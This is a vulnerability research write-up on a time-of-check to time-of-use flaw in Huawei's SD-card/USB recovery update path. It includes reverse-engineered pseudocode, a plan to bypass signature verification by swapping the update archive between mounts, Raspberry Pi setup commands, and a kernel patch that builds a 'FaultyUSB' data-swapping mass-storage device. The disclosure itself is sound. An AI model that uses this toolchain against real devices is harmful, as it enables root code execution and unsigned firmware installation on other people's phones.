Huawei SD-update: Updates via SD Card

Huawei devices implement a proprietary update solution, which is identical throughout Huawei’s device lineup regardless of the employed chipset (Hisilicon, Qualcomm, Mediatek) or the used base OS (EMUI, HarmonyOS) of a device.

This common update solution has in fact many ways to apply a system update, one of them is the “SD-update”. As its name implies, the “SD-update” method expects the update file to be stored on an external media, such as on an SD card or on an USB flash drive. After reverse engineering how Huawei implements this mode, we have identified a logic vulnerability in the handling of the update file located on external media, where the update file gets reread between different verification phases.

While this basic vulnerability primitive is straightforward, exploitation of it presented some interesting challenges, not least of which was that we needed to develop a custom software emulation of an USB flash drive to be able to provide the recovery with different data on each read, as well as we had to identify additional gaps of the update process authentication implementation to make it possible to achieve arbitrary code execution as root in recovery mode.

Time-of-Check to Time-of-Use

The root cause of the vulnerability lies in an unfortunate design decision of the external media update path of the recovery binary: when the user supplies the update files on a memory card or a USB mass-storage device, the recovery handles them in-place.

In bird’s-eye view the update process contains two major steps: verification of the ZIP file signature and then applying the actual system update. The problem is that the recovery binary accesses the external storage device numerous times during the update process; e.g. first it discovers the relevant update files, then reads the version and model numbers, verifies the authenticity of the archive, etc.

So in the case of a legitimate update archive, once the verification succeeds, the recovery tries to read the media again to perform the actual installation. But a malicious actor can swap the update file just between the two stages, so the installation phase would use a different, unverified update archive. In essence, we have a textbook “Time-of-Check to Time-of-Use” (ToC-ToU) vulnerability, indicating that a race condition can be introduced between the “checking” (verification) and the “using” (installation) stages. The next step was figuring out how we could actually trigger this vulnerability in practice!
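
Reduced to a toy sketch (with hypothetical helper names, not the recovery's real API), the vulnerable pattern is simply:

// Both helpers re-read the archive from the external media on each call.
bool sd_update(const char *path) {
    if (!verify_zip_signature(path))  // read #1: media serves the legitimate, signed archive
        return false;
    return install_update(path);      // read #2: media may now serve a malicious archive
}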

Attacking Multiple Reads in the Recovery Binary

With an off-the-shelf USB flash drive it is very clear that by considering a specific offset, two reads without intermediate writes must result in the same data, otherwise the drive would be considered faulty. So in terms of the update procedure this means the data-consistency is preserved: during the update for each point in time the data on the external drive matches up with what the recovery binary reads. Consequently, as long as a legitimate USB drive is used, the design decision of using the update file in-place is functionally correct.

Now consider a “faulty” USB flash drive, which returns different data when the same offset if read twice (of course, without any writes between them). This would break the data-consistency assumption of the update process, as it may happen that different update steps see the update file differently.

The update media is basically accessed for three distinct reasons: listing and opening files, opening the update archive as a traditional ZIP file, and reading the update archive for Android-specific signature verification. These access types could enable different modes of exploiting this vulnerability by changing the data returned by the external media. For example, in the case of multiple file system accesses of the same location, the update.zip file itself can be replaced as-is with a completely unrelated file. Alternatively, multiple reads during the ZIP parsing can be turned into smuggling new ZIP entries inside the original archive (see the CVE-2021-40045: Huawei Recovery Update Zip Signature Verification Bypass vulnerability in UnZiploc).

Accordingly, multiple kinds of exploitation goals can be set. For example, by only modifying the content of the UPDATE.APP file of the update archive at install time, an arbitrary set of partitions can be written with arbitrary data on the main flash. A more generic approach is to gain code execution just before writing to flash in the EreInstallPkg function, by smuggling a custom update-binary into the ZIP file.

In the following we are going to use the approach of injecting a custom binary in order to achieve the arbitrary code execution by circumventing the update archive verification.

At this point we must mention a crucial factor: the caching behavior of the underlying Linux system and its effects on exploitability. For readability reasons this challenge is outlined in the next section, so for now we continue with the assumption that we will be able to swap results between repeated read operations.

Sketching out the code flow of an update procedure helps understanding exactly where multiple reads can occur. Since our last exploit of Huawei’s recovery mode some changes have occurred (e.g. functions got renamed), so the update flow is detailed again here for clarity.

First of all, the “SD-update” method is handled by HuaweiUpdateNormal, which essentially wraps the HuaweiUpdateBase function. Below is an excerpt of the function call tree of HuaweiUpdateBase, mostly indicating the functions which interact with the update media or contain essential verification functions.

HuaweiUpdateBase
├── [> DoCheckUpdateVersion <]
│   ├── {> hw_ensure_path_mounted("/usb") <}
│   ├── CheckVersionInZipPkg
│   │   ├── mzFindZipEntry("SOFTWARE_VER_LIST.mbn")
│   │   ├── mzFindZipEntry("SD_update.tag")
│   │   ├── mzFindZipEntry("OTA_update.tag")
│   │   ├── DoCheckVersion
│   │   ├── mzFindZipEntry("BOARDID_LIST.mbn")
│   └── {> hw_ensure_path_unmounted("/usb") <}
└── HuaweiOtaUpdate
    └── DoOtaUpdate
        ├── MountSdCardWithRetry
        │   └── {> hw_ensure_path_mounted("/usb") <}
        ├── PkgTypeUptVerPreCheck
        │   └── HwUpdateTagPreCheck
        │       └── UpdateTagCheckInPkg
        │           ├── mzFindZipEntry("full_mainpkg.tag")
        │           └── GetInfoFromTag("UPT_VER.tag")
        ├── [> HuaweiUpdatePreCheck <]
        │   ├── HuaweiSignatureAndAuthVerify
        │   │   ├── HwMapAndVerifyPackage
        │   │   │   ├── do_map_package
        │   │   │   │   └── hw_ensure_path_mounted("/usb")
        │   │   │   ├── HwSignatureVerifyPackage
        │   │   │   │   ├── GetInfoFromTag("hotakey_sign_version.tag")
        │   │   │   │   └── verify_file_v1
        │   │   │   │       └── verifyInstance.Verify
        │   │   │   └── GetInfoFromTag("META-INF/CERT.RSA")
        │   │   ├── IsSdRootPackage
        │   │   │   └── get_zip_pkg_type
        │   │   │       ├── mzFindZipEntry("SD_update.tag")
        │   │   │       ├── mzFindZipEntry("OTA_update.tag")
        │   │   │       └── get_pkg_type_by_tag
        │   │   │           └── mzFindZipEntry("OTA/SD_update.tag")
        │   │   └── HwUpdateAuthVerify
        │   │       ├── IsNeedUpdateAuth
        │   │       ├── IsUnauthPkg
        │   │       │   ├── IsSDupdatePackageCompress
        │   │       │   │   └── mzFindZipEntry("SD_update.tag")
        │   │       │   └── mzFindZipEntry("skipauth_pkg.tag")
        │   │       └── get_update_auth_file_path
        │   │           └── mzFindZipEntry("VERSION.mbn")
        │   ├── DoSecVerifyFromZip
        │   │   └── HwSecVerifyFromZip
        │   │       └── mzFindZipEntry("sec_xloader_header")
        │   ├── IsAllowShipDeviceUpdate
        │   ├── MtkDevicePreUpdateCheck
        │   ├── CheckBoardIdInfo
        │   │   └── mzFindZipEntry("BOARDID_LIST.mbn")
        │   ├── UpdatePreCheck_wrapper
        │   │   └── UpdatePreCheck
        │   │       └── CheckPackageInfo
        │   │           ├── MapAndOpenZipPkg
        │   │           ├── InitPackageInfo
        │   │           │   └── mzFindZipEntry("packageinfo.mbn")
        │   │           └── CheckZipPkgInfo
        │   └── USBUpdateVersionCheck
        ├── HuaweiUpdatePreUpdate
        └── [> EreInstallPkg <]
            ├── hw_setup_install_mounts
            │   └── {> hw_ensure_path_unmounted("/usb") <}
            ├── do_map_package
            │   └── {> hw_ensure_path_mounted("/usb") <}
            ├── mzFindZipEntry("META-INF/com/google/android/update-binary")
            └── execv("/tmp/update_binary")

The functions in square brackets divide the update process into three phases:

  • Device firmware version compatibility checking
  • Android signature verification, update type and version checking
  • Update installation via the provided update-binary file

In the first stage, the version checking makes sure that the provided update archive is compatible with the current device model and the installed OS version. (The code snippets below are from the reverse engineered pseudocode.)

bool DoCheckUpdateVersion(ulong argc, char **argv) {

  ... /* ensures the battery is charged enough, else exit */

  for (pkgIndex = 1; pkgIndex < argc; pkgIndex++) {
    curr_arg = argv[pkgIndex];
    if (!curr_arg || strncmp(curr_arg,"--update_package=",0x11)) {
      log("%s:%s,line=%d:skip path:%s,pkgIndex:%d\n","Info","CheckAllPkgVersionAllow",0x1dd,curr_arg,pkgIndex & 0xffffffff);
      continue;
    }
    curr_arg = curr_arg + 0x11;
    log("%s:%s,line=%d:reallyPath:%s\n","Info","DoCheckUpdateVersion",0x1c0,curr_arg);

    /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
     * Here curr_arg points to the file path of the update archive *
     * The media which contains this file is getting mounted       *
     * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
    r = hw_ensure_path_mounted_wrapper(curr_arg,"DoCheckUpdateVersion");
    if (r < 0) {
      log("%s:%s,line=%d:mount %s fail\n","Err","DoCheckUpdateVersion",0x1c2,curr_arg);
      return false;
    }

    set_versioncheck_flag(0);
    SetPkgSignatureFlag(1);

    /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
     * Examine the 'SOFTWARE_VER_LIST.mbn' file for compatibility  *
     * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
    check_ret = CheckVersionInZipPkg(curr_arg);
    SetPkgSignatureFlag(0);

    /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
     * Explicitly unmount the media holding the update archive     *
     * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
    r = hw_ensure_path_unmounted_wrapper(curr_arg,"DoCheckUpdateVersion");
    if (r < 0) {
      log("%s:%s,line=%d:unmount %s fail\n","Warn","DoCheckUpdateVersion",0x1cb,curr_arg);
    }

    if ((check_ret & 1) == 0) {
      log("%s:%s,line=%d:%s,not allow in version control\n","Err","DoCheckUpdateVersion",0x1ce,curr_arg);
      log("%s:%s,line=%d:push UPDATE_VERSION_CHECK_FAIL_L1\n","Info","DoCheckUpdateVersion",0x1cf);
      push_command_stack(&command_stack,0x85);
      return false;
    }
    ret = true;
  }

  return ret;
}

The second stage contains most of the complex verification functionality, such as checking the Android-specific cryptographic signature and the update authentication token. It also performs an extensive inspection on the compatibility of the update and the device.

int HuaweiOtaUpdate(int argc, char **argv) {
  ...
  log("%s:%s,line=%d:push HOTA_BEGIN_L0\n","Info","HuaweiOtaUpdate",0x5a6);
  ...
  ret = DoOtaUpdate(argc, argv);
  ...
}

int DoOtaUpdate(int argc, char **argv) {
  ... /* tidy the update package paths */

  g_totalPkgSz = 0;
  for (pkgIndex = 0; pkgIndex < count; pkgIndex++) {
    /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
     * The media which contains the update package gets mounted here *
     * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
    MountSdCardWithRetry(path_list[pkgIndex],5);

    ... /* ensuring that the update package does exist */

    g_totalPkgSz = g_totalPkgSz + auStack568._48_8_;
  }
  log("%s:%s,line=%d:g_totalPkgSz = %llu\n","Info","DoOtaUpdate",0x45b,g_totalPkgSz);

  result = PkgTypeUptVerPreCheck(argc,argv,ProcessOtaPackagePath);
  if ((result & 1) == 0) {
    log("%s:%s,line=%d:PkgTypeUptVerPreCheck fail\n","Err","DoOtaUpdate",0x460);
    return 1;
  }
  result = HuaweiUpdatePreCheck(path_list,loop_counter,count);
  if ((result & 1) == 0) {
    log("%s:%s,line=%d:HuaweiUpdatePreCheck fail\n","Err","DoOtaUpdate", 0x465);
    return 1;
  }
  result = HuaweiUpdatePreUpdate(path_list,loop_counter,count);
  if ((result & 1) == 0) {
    log("%s:%s,line=%d:HuaweiUpdatePreUpdate fail\n","Err","DoOtaUpdate", 0x46b);
    return 1;
  }

  ...

  for (pkgIndex = 0; pkgIndex < count; pkgIndex++) {
    log("%s:%s,line=%d:push HOTA_PRE_L1\n","Info","DoOtaUpdate",0x474);
    push_command_stack(&command_stack,3);
    package_path = path_list[pkgIndex];
    ... /* ensure the package does exists */
    ... /* update the visual update progress bar */
    log("%s:%s,line=%d:pop HOTA_PRE_L1\n","Info","DoOtaUpdate",0x48d);
    pop_command_stack(&command_stack);
    log("%s:%s,line=%d:push HOTA_PROCESS_L1\n","Info","DoOtaUpdate",0x48f);
    push_command_stack(&command_stack,4);
    log("%s:%s,line=%d:OTA update from:%s\n","Info","DoOtaUpdate",0x491,
        package_path);

    /* 'IsPathNeedMount' returns true for the SD update package paths */
    needs_mount = IsPathNeedMount(package_path_string);
    ret = EreInstallPkg(package_path,local_1b4,"/tmp/recovery_hw_install",needs_mount & 1);

    ... /* update the visual update progress bar */
  }
}

int MountSdCardWithRetry(char *path, uint retry_count) {
  ... /* sanity checks */
  if (retry_count < 6 && (!strstr(path,"/sdcard") || !strstr(path,"/usb"))) {
    /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
     * USB drives mounted under the '/usb' path, so this path is taken     *
     * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
    for (trial_count = 1; trial_count < retry_count; trial_count++) {
      if (hw_ensure_path_mounted(path))
        return 0;
      ... /* error handling */
      sleep(1);
    }
    log("%s:%s,line=%d:mount %s fail\n","Err","MountSdCardWithRetry",0x8b1,path);
    return -1;
  }
  if (hw_ensure_path_mounted(path)) {
    ... /* error handling */
    return -1;
  }
  return 0;
}

Finally, in the third stage, the update installation begins by extracting the update-binary from the update archive and executing it. From this point forward, the bundled update binary handles the rest of the update process, like extracting the UPDATE.APP file containing the actual data to be flashed.

uint EreInstallPkg(char *path, undefined *wipeCache, char *last_install, bool need_mount) {
  ... /* create and write the 'path' value into the 'last_install' file */
  if (!path || g_otaUpdateMode != 1 ||  get_current_run_mode() != 2) {
    log("%s:%s,line=%d:path is null or g_otaUpdateMode != 1 or current run mode  is %d!\n","Err","HuaweiPreErecoveyUpdatePkgPercent",0x493,get_current_run_mode());
    ret = hw_setup_install_mounts();
  } else {
    ... /* with SD update mode this path is not taken */
  }
  if (!ret) {
    log("%s:%s,line=%d:failed to set up expected mounts for install,aborting\n",
        "Err","install_package",0x5b8);
    return 1;
  }
  ... /* logging and visual progess related functions */
  ret = do_map_package(path, need_mount & 1, &package_map);
  if (!ret) {
    log("%s:%s,line=%d:map path [%s] fail\n","Err","ReallyInstallPackage",0x575,path);
    return 2;
  }

  zip_handle = mzOpenZipArchive(package_map,package_length,&archive);
  ... /* error handling */
  updatebinary_entry = mzFindZipEntry(&archive,"META-INF/com/google/android/update-binary");
  log("%s:%s,line=%d:push HOTA_TRY_BINARY_L2\n","Info","try_update_binary",0x21e);
  push_command_stack(&command_stack,0xd);
  ... /* error handling */
  unlink("/tmp/update_binary");
  updatebinary_fd = creat("/tmp/update_binary",0x1ed);
  mzExtractZipEntryToFile(&archive,updatebinary_entry,updatebinary_fd);
  EnsureFileClose(updatebinary_fd,"/tmp/update_binary");
  ... /* FindUpdateBinaryFunc: check the kind of the update archive */
  mzCloseZipArchive(&archive);
  ...

  if (fork() == 0) {
    ...
    execv(updatebinary_path, updatebinary_argv);
    _exit(-1);
  }
  log("%s:%s,line=%d:push HOTA_ENTERY_BINARY_L3\n","Info","try_update_binary",0x295);
  push_command_stack(&command_stack,0x16);

  ...
}

int hw_setup_install_mounts(void) {
  ...
  for (partition_entry : g_partition_table) {
    if (!strcmp(partition_entry, "/tmp")) {
      if (hw_ensure_path_mounted(partition_entry)) {
        log("%s:%s,line=%d:failed to mount %s\n","Err","hw_setup_install_mounts",0x5a1,partition_entry);
        return -1;
      }
    }
    /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
     * Every entry in the partition table gets unmounted except /tmp *
     * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
    else if (hw_ensure_path_unmounted(partition_entry)) {
      log("%s:%s,line=%d:fail to unmount %s\n","Warn","hw_setup_install_mounts",0x5a6,partition_entry);
      if (!strcmp(partition_entry,"/data") && !try_umount_data())
        log("%s:%s,line=%d:umount data fail\n","Err","hw_setup_install_mounts",0x5a9);
    }
  }
  return 0;
}

int do_map_package(char *path, bool needs_mount, void *package_map) {
  ... /* sanity checks */
  if (needs_mount) {
    if (*path == '@' && hw_ensure_path_mounted(path + 1)) {
      log("%s:%s,line=%d:mount (path+1) fail\n","Warn","do_map_package",0x3f0);
      return 0;
    }
    for (trial_count = 0; trial_count < 10; trial_count++) {
      log("%s:%s,line=%d:try to mount %s in %d/%u times\n","Info","do_map_package",0x3f5,path,trial_count,10);

      /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * needs_mount = true, so the USB flash drive gets mounted here  *
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
      if (hw_ensure_path_mounted(path)) {
        log("%s:%s,line=%d:try to mount %s in %d times successfully\n","Info","do_map_package",0x3f7,path,trial_count);
        return 0;
      }
      ... /* error handling */
      sleep(1);
    }
    ... /* error handling */
  }
  if (sysMapFile(path,package_map) == 0) {
    log("%s:%s,line=%d:map path [%s] success\n","Info","do_map_package",0x40a,path);
    return 1;
  }
  log("%s:%s,line=%d:map path [%s] fail\n","Err","do_map_package",0x407,path);
  return 0;
}

Based on this flow it is easy to spot that if an update archive gets past the second phase (cryptographic verification), code execution is achieved afterwards, because the recovery process would try to extract and run the update-binary file of the update archive. Thanks to these multiple reads, the attacker could therefore provide different update archives at each of these stages, so a straightforward exploitation plan emerges (a toy sketch of the attacker-side logic follows the list):

  • Version checking stage: construct a valid SOFTWARE_VER_LIST.mbn file
  • Signature verification: supply a pristine update archive
  • Installation: inject the custom update-binary
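
A toy model of the attacker-side logic (purely illustrative: the stage tracking and buffer names are assumptions, and the real implementation is the kernel patch shown later):

#include <stdint.h>

enum update_stage { VERSION_CHECK, SIGNATURE_CHECK, INSTALL };

extern const uint8_t pristine_image[];   // valid SOFTWARE_VER_LIST.mbn, properly signed archive
extern const uint8_t malicious_image[];  // same archive with a smuggled update-binary

// Serve a different view of the drive depending on which stage is reading.
static const uint8_t *serve_read(enum update_stage stage, uint64_t offset)
{
    return (stage == INSTALL) ? malicious_image + offset
                              : pristine_image + offset;
}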

Circumventing Linux Kernel Caching Of External Media

The previous section introduced our “straightforward” exploitation plan.

However, in practice, it does not suffice to just treat the file read syscalls of the update binary as if each of them directly resulted in a unique read request to the external media.

The relevant update files are actually mmap-ed by the update binary, and the generated memory read accesses get handled first by the file system API, then by the block device layer of the Linux kernel, and finally, after all those layers, they get forwarded to the external media. The file system API uses the actual file system implementation (e.g. exFAT) to turn the high level requests (e.g. “read the first 0x400 bytes from the file named /usb/update_sd_base.zip”) into a lower level access of the underlying block device (e.g. “read 0x200 bytes from offset 0x12340000 and read 0x200 bytes from offset 0x56780000 on the media”). The block device layer generates the lowest level request, which can be interpreted directly by the storage media, e.g. SCSI commands in case of a USB flash drive.

In addition, the Linux kernel caches the read responses of both the file system API (page cache) and the block devices (block cache, part of the page cache). So the second time the same read request arrives, the response may be served from the cache instead of the storage media, depending on the amount of free memory.

Therefore, in the real world, frequent multiple reads of external media normally do not occur, thanks to the caching of the operating system. In other words, it is up to the Linux kernel’s caching algorithm when a memory access issued by the recovery binary actually translates into a direct read request to the external media, and it depends heavily on the amount of free memory available. In practice, our analysis showed that the combination of the caching policy and the roughly 7 GB of free memory (on flagship phones) works surprisingly well: virtually zero rereads should occur while handling update files, which are at most 5 GB in size, so they fit into memory as a whole. So, at first glance, you might think that the Linux kernel’s caching behavior would prevent us from actually exploiting this theoretical ToC-ToU vulnerability. (Un)fortunately, this was not the case!

We can take a step back from the caching behavior of normal read operations and look at the functions highlighted in curly brackets in the code flow chart above: those implement the mount and unmount commands. This shows that the file system of the external media is unmounted and remounted between the stages we’ve previously defined! The file cache of the Linux kernel is naturally bound to the backing file system, so when an unmount event happens, the corresponding cache entries are flushed. The subsequent mount command starts with an empty cache state, so the update file must be read again directly from the external media. This deterministically enables an attacker to supply a different update archive, or even a completely new file system, at each mount command, and thus it can eventually be used to bypass the cryptographic verification and supply an arbitrary update archive as per the above. Phew 🙂

Creating FaultyUSB

Based on the above we had an exploit plan, but what was still left was actually implementing our previously discussed “FaultyUSB”: a USB flash drive (USB-OTG mass storage) which can detect the mount events and alter the response data based on a trigger condition. In the following we give a brief, practical guide on how we set up our test environment.

Raspberry Pi As A Development Platform

The Linux kernel has support for USB OTG mass storage device class in general, but we needed to find a computer which has the requisite hardware support for USB OTG, since regular PCs are designed to work in USB host mode only. Of course, Huawei phones themselves support this mode, but for the ease of development we selected the popular Raspberry Pi single-board computer. Specifically, a Raspberry Pi 4B (RPi) model was used, as it supports USB OTG mode on its USB-C connector.

“Raspberry Pi OS Lite (64bit) (2022.04.04.)” is used as a base image for the RPi and written to an SD card. The size of the SD card doesn’t matter as long as the OS fits on it; a minimum of approx. 2 GB is recommended.

Writing the image to the SD card is straightforward:

xzcat 2022-04-04-raspios-bullseye-arm64-lite.img.xz | sudo dd of=/dev/mmcblk0 bs=4M iflag=fullblock oflag=direct

Then we mount the first partition, create a user account file and the configuration file, and also enable the SSH server. The userconf.txt file below defines the pi user with the raspberry password. The config file disables the Wi-Fi and the Bluetooth to lower power usage, and also configures the USB controller in OTG mode. The command line defines the command to load the USB controller with the mass storage module.

mount /dev/mmcblk0p1 /mnt && cd /mnt

touch ssh

echo 'pi:$6$/4.VdYgDm7RJ0qM1$FwXCeQgDKkqrOU3RIRuDSKpauAbBvP11msq9X58c8Que2l1Dwq3vdJMgiZlQSbEXGaY5esVHGBNbCxKLVNqZW1' > userconf.txt

echo 'arm_64bit=1
dtoverlay=dwc2,dr_mode=peripheral
#arm_freq=600
arm_boost=0
disable_splash=1
dtoverlay=disable-bt
dtoverlay=disable-wifi
boot_delay=0' > config.txt

echo 'console=serial0,115200 console=tty1 root=PARTUUID=<UUID>-02 rootfstype=ext4 rootwait modules-load=dwc2,g_mass_storage' > cmdline.txt

cd && umount /dev/mmcblk0p1

Now we can put the SD card back into the RPi and connect it to a router via the Ethernet interface. By default, Raspbian OS tries to negotiate an IP address via DHCP and broadcasts the raspberry.local name over the mDNS protocol, so at first we simply connected to it over SSH with the previously configured username and password. But we didn’t actually find DHCP reliable enough, so we decided to use a static IP address instead:

sudo systemctl disable dhcpcd.service
sudo systemctl stop dhcpcd.service

echo 'auto eth0
allow-hotplug eth0
iface eth0 inet static
  address 10.1.0.1
  netmask 255.255.255.0' | sudo tee /etc/network/interfaces.d/eth0

Getting High On Our Own Power Supply

The power supply of the Raspberry Pi 4B proved to be problematic for this particular setup. It can be powered either through the USB-C connector or through dedicated pins of the IO header, and it requires a non-trivial amount of power, about 1.5 A. When supplying power from the IO headers, the regulated 5 V voltage also appears on the VDD pins of the USB-C connector, and when connecting it to a Huawei phone, the phone incorrectly detects the RPi as being in USB host mode instead of the desired OTG mode. As it turned out, the USB-C connector on the RPi is in fact not fully USB-C compatible…

Luckily, the tested Huawei phones can supply enough power to boot the RPi. However, it takes about 8-10 seconds for the RPi to fully boot up, and Huawei phones shut the power down while rebooting into recovery mode. Obviously, this means that the RPi shuts down for lack of power, and the target Huawei phone only re-enables power over USB-C once it has already booted into recovery mode. That’s why it is possible (and during our development this occurred several times) that the RPi misses the recovery’s timeout window for waiting for a USB drive, simply because it can’t boot up fast enough.

One way to solve this problem is to boot the phone into eRecovery mode by holding the Power and Volume Up buttons, because that way the update doesn’t begin automatically, giving the RPi some time to boot up. But we wanted to support a more comfortable way of updating, from the “Project Menu” application’s “Software Upgrade / Memory card Update” option, which applies the archive automatically without waiting for any user interaction.

Our solution was to power the RPi via a USB-C breakout board with a dedicated power supply adapter. The breakout board passes the data lines through to the target Huawei phone, but the VDD lines are disconnected (i.e. the PCB traces are cut) in the direction of the phone, to prevent the RPi from being recognized as a host device. With this setup the RPi can be powered independently of the target device, and it can be accessed over SSH via the Ethernet interface regardless of the power state of the target Huawei phone.

To further tweak the OS boot time and power consumption, we disable a few unnecessary services:

sudo systemctl disable rsyslog.service
sudo systemctl stop rsyslog.service
sudo systemctl disable avahi-daemon
sudo systemctl stop avahi-daemon
sudo systemctl disable avahi-daemon.socket
sudo systemctl stop avahi-daemon.socket
sudo systemctl disable triggerhappy.service
sudo systemctl stop triggerhappy.service
sudo systemctl disable wpa_supplicant.service
sudo systemctl stop wpa_supplicant.service
sudo systemctl disable systemd-timesyncd
sudo systemctl stop systemd-timesyncd

To further optimize power consumption, we disable as much of the currently unnecessary GPU subsystem as we can. To avoid premature write-exhaustion of the SD card, we also stop persisting the log files, because we are about to generate quite a few megabytes of them.

echo 'blacklist bcm2835_codec
blacklist bcm2835_isp
blacklist bcm2835_v4l2
blacklist drm
blacklist rpivid_mem
blacklist vc_sm_cma' | sudo tee /etc/modprobe.d/blacklist-bcm2835.conf

echo '[Journal]
Storage=volatile
RuntimeMaxUse=64M' | sudo tee /etc/systemd/journald.conf

Finally we restart the RPi, verify that it is still accessible over SSH, and shut it down in preparation for the kernel build.

Kernel Module Patching

The main requirement of the programmable USB OTG mass storage device is the ability to detect the update state, so that it can serve different content based on the current stage. The most obvious place to implement such a feature is directly in the mass storage function implementation, which is located at drivers/usb/gadget/function/f_mass_storage.c in the Linux kernel.

The crucial feature of FaultyUSB is the trigger implementation, which dictates when to hide the smuggled ZIP file. To implicitly detect the state of the update process, a very simple counting algorithm proved to be sufficient. Specific parts of the file system seem to be read only during mount events, so by counting mount-like access patterns the update stage can be recovered.

While the trigger condition is active, the read responses are modified by masking them with zeros. The read address and the masking area size should be configured to cover the smuggled ZIP at the end of the update archive.

Here is the mass_storage_patch.diff file, with a huge amount of logging code:

diff --git a/drivers/usb/gadget/function/f_mass_storage.c b/drivers/usb/gadget/function/f_mass_storage.c
index 6ad669dde..653463213 100644
--- a/drivers/usb/gadget/function/f_mass_storage.c
+++ b/drivers/usb/gadget/function/f_mass_storage.c
@@ -596,6 +596,8 @@ static int do_read(struct fsg_common *common)
 	unsigned int		amount;
 	ssize_t			nread;
 
+	loff_t begin, end;
+
 	/*
 	 * Get the starting Logical Block Address and check that it's
 	 * not too big.
@@ -662,8 +664,35 @@ static int do_read(struct fsg_common *common)
 		file_offset_tmp = file_offset;
 		nread = kernel_read(curlun->filp, bh->buf, amount,
 				&file_offset_tmp);
+		LINFO(curlun, "READ A=0x%llx S=0x%x\n", file_offset, amount);
 		VLDBG(curlun, "file read %u @ %llu -> %d\n", amount,
 		      (unsigned long long)file_offset, (int)nread);
+
+		/* mask read on trigger (e.g. when trigger_counter == 1) */
+		if (
+			((file_offset + amount) > curlun->payload_offset) &&
+			(file_offset < (curlun->payload_offset + curlun->payload_size))
+		) {
+			LINFO(curlun, "READ ON PAYLOAD AREA (A=0x%llx S=0x%x)\n",
+			      file_offset, amount);
+			if (curlun->trigger_counter == 1) {
+				begin = max(file_offset, curlun->payload_offset) - file_offset;
+				end = min(file_offset + amount, curlun->payload_offset + curlun->payload_size) - file_offset;
+				LINFO(curlun, "READ ZERO-MASKED RANGE: [0x%llx;0x%llx)\n", begin, end);
+				memset(bh->buf + begin, 0, end-begin);
+			}
+		}
+
+		/* detect read on the trigger offset and decrement the trigger counter */
+		if (
+			(curlun->trigger_counter > 0) && 
+			(curlun->trigger_offset >= file_offset) &&
+			(curlun->trigger_offset < (file_offset+amount))
+		) {
+			LINFO(curlun, "READ ON TRIGGER OFFSET: T=%d\n", curlun->trigger_counter);
+			curlun->trigger_counter -= 1;
+		}
+
 		if (signal_pending(current))
 			return -EINTR;
 
@@ -858,6 +887,7 @@ static int do_write(struct fsg_common *common)
 		file_offset_tmp = file_offset;
 		nwritten = kernel_write(curlun->filp, bh->buf, amount,
 				&file_offset_tmp);
+		LINFO(curlun, "WRITE A=0x%llx S=0x%x\n", file_offset, amount);
 		VLDBG(curlun, "file write %u @ %llu -> %d\n", amount,
 				(unsigned long long)file_offset, (int)nwritten);
 		if (signal_pending(current))
@@ -922,6 +952,7 @@ static void invalidate_sub(struct fsg_lun *curlun)
 	unsigned long	rc;
 
 	rc = invalidate_mapping_pages(inode->i_mapping, 0, -1);
+	LINFO(curlun, "invalidate_mapping_pages");
 	VLDBG(curlun, "invalidate_mapping_pages -> %ld\n", rc);
 }
 
@@ -996,6 +1027,7 @@ static int do_verify(struct fsg_common *common)
 		file_offset_tmp = file_offset;
 		nread = kernel_read(curlun->filp, bh->buf, amount,
 				&file_offset_tmp);
+		LINFO(curlun, "VERIFY A=0x%llx S=0x%x\n", file_offset, amount);
 		VLDBG(curlun, "file read %u @ %llu -> %d\n", amount,
 				(unsigned long long) file_offset,
 				(int) nread);
@@ -2733,6 +2765,12 @@ int fsg_common_create_lun(struct fsg_common *common, struct fsg_lun_config *cfg,
 	lun->initially_ro = lun->ro;
 	lun->removable = !!cfg->removable;
 
+	/* ToC-ToU patch */
+	lun->trigger_counter = cfg->trigger_counter;
+	lun->trigger_offset = cfg->trigger_offset;
+	lun->payload_offset = cfg->payload_offset;
+	lun->payload_size = cfg->payload_size;
+
 	if (!common->sysfs) {
 		/* we DON'T own the name!*/
 		lun->name = name;
@@ -2770,11 +2808,13 @@ int fsg_common_create_lun(struct fsg_common *common, struct fsg_lun_config *cfg,
 				p = "(error)";
 		}
 	}
-	pr_info("LUN: %s%s%sfile: %s\n",
+	pr_info("LUN: %s%s%sfile: %s trigger:%d@0x%llx payload:[0x%llx;0x%llx)\n",
 	      lun->removable ? "removable " : "",
 	      lun->ro ? "read only " : "",
 	      lun->cdrom ? "CD-ROM " : "",
-	      p);
+	      p,
+	      lun->trigger_counter, lun->trigger_offset,
+	      lun->payload_offset, lun->payload_offset+lun->payload_size);
 	kfree(pathbuf);
 
 	return 0;
@@ -3333,6 +3373,9 @@ static struct usb_function_instance *fsg_alloc_inst(void)
 		goto release_common;
 
 	pr_info(FSG_DRIVER_DESC ", version: " FSG_DRIVER_VERSION "\n");
+	pr_info("***********************************\n");
+	pr_info("* Patched for ToC-ToU exploration *\n");
+	pr_info("***********************************\n");
 
 	memset(&config, 0, sizeof(config));
 	config.removable = true;
@@ -3428,6 +3471,12 @@ void fsg_config_from_params(struct fsg_config *cfg,
 			params->file_count > i && params->file[i][0]
 			? params->file[i]
 			: NULL;
+		
+		/* ToC-ToU patch */
+		lun->trigger_counter = params->trigger_counter[i];
+		lun->trigger_offset = params->trigger_offset[i];
+		lun->payload_offset = params->payload_offset[i];
+		lun->payload_size = params->payload_size[i];
 	}
 
 	/* Let MSF use defaults */
diff --git a/drivers/usb/gadget/function/f_mass_storage.h b/drivers/usb/gadget/function/f_mass_storage.h
index 3b8c4ce2a..1e13a2177 100644
--- a/drivers/usb/gadget/function/f_mass_storage.h
+++ b/drivers/usb/gadget/function/f_mass_storage.h
@@ -16,6 +16,15 @@ struct fsg_module_parameters {
 	unsigned int	nofua_count;
 	unsigned int	luns;	/* nluns */
 	bool		stall;	/* can_stall */
+
+	/* ToC-ToU patch */
